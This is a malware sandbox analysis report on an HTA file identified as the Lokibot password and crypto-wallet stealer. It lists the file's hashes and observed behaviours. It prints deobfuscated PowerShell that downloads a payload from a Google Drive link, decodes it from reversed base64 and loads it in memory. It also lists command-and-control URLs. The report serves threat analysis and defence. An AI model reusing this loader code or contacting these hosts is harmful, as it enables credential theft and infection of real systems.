Overview

overview

10

Static

static

1

nicegirlwi...me.hta

windows7-x64

10

nicegirlwi...me.hta

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    nicegirlwithnewthingswhichevennobodknowthatkissingme.hta

  • Size

    130KB

  • Sample

    241024-fx1zeavfre

  • MD5

    401fa9878282b2404925d1ac2599b7c0

  • SHA1

    876d5ea4b89ef48cd614fc098154e3e2caa176f3

  • SHA256

    b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948

  • SHA512

    45e2de1e196ae5339df31581bd8e98af094ab461f80269a815f369e51e131a885bb9745c60375aa4c95db75e82d58f799c5ae480ac2aa0b8387baa2aea2d0f63

  • SSDEEP

    96:Eam73bDpMZMY9pMZMUyOX/DJfqMtJNpMZMVx7T:Ea23bDCuY9Cuitht/CuV9T

Score
10/10
lokibotcollectiondefense_evasiondiscoveryexecutionspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
invoke-expression "$imageUrl = 'https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Command.ToCharArray() | ForEach-Object { $_ })[-1..-($base64Command.Length)];$commandBytes = [System.Convert]::FromBase64String($base64Reversed);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.RREPLMS/53/141.671.3.291//:ptth', 'desativado', 'desativado', 'desativado', 'AddInProcess32', 'desativado', 'desativado','desativado','desativado','desativado','desativado','desativado','1','desativado'));"
3
4
# powershell snippet 1
5
$imageurl = "https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur "
6
$webclient = new-object system.net.webclient
7
$imagebytes = $webclient.downloaddata("https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur ")
8
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
9
$startflag = "<<BASE64_START>>"
10
$endflag = "<<BASE64_END>>"
11
$startindex = $imagetext.indexof("<<BASE64_START>>")
12
$endindex = $imagetext.indexof("<<BASE64_END>>")
13
$startindex -ge 0 -and $endindex -gt $startindex
14
$startindex = $startflag.length
15
$base64length = $endindex - $startindex
16
$base64command = $imagetext.substring($startindex, $base64length)
17
$base64reversed = -join $base64command.tochararray()|%{$_}[-(1..)($base64command.length)]
18
$commandbytes = [system.convert]::frombase64string($base64reversed)
19
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
20
$vaimethod = ([dnlib.io.home]).getmethod("VAI")
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

C2

http://94.156.177.220/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Targets

    • Target

      nicegirlwithnewthingswhichevennobodknowthatkissingme.hta

    • Size

      130KB

    • MD5

      401fa9878282b2404925d1ac2599b7c0

    • SHA1

      876d5ea4b89ef48cd614fc098154e3e2caa176f3

    • SHA256

      b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948

    • SHA512

      45e2de1e196ae5339df31581bd8e98af094ab461f80269a815f369e51e131a885bb9745c60375aa4c95db75e82d58f799c5ae480ac2aa0b8387baa2aea2d0f63

    • SSDEEP

      96:Eam73bDpMZMY9pMZMUyOX/DJfqMtJNpMZMVx7T:Ea23bDCuY9Cuitht/CuV9T

    Score
    10/10
    defense_evasiondiscoveryexecutionlokibotcollectionspywarestealertrojan

    • Lokibot

      Lokibot is a Password and CryptoCoin Wallet Stealer.

      trojanspywarestealerlokibot

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Evasion via Device Credential Deployment

      defense_evasionexecution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Accesses Microsoft Outlook profiles

      collection

    • Legitimate hosting services abused for malware hosting/C2

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.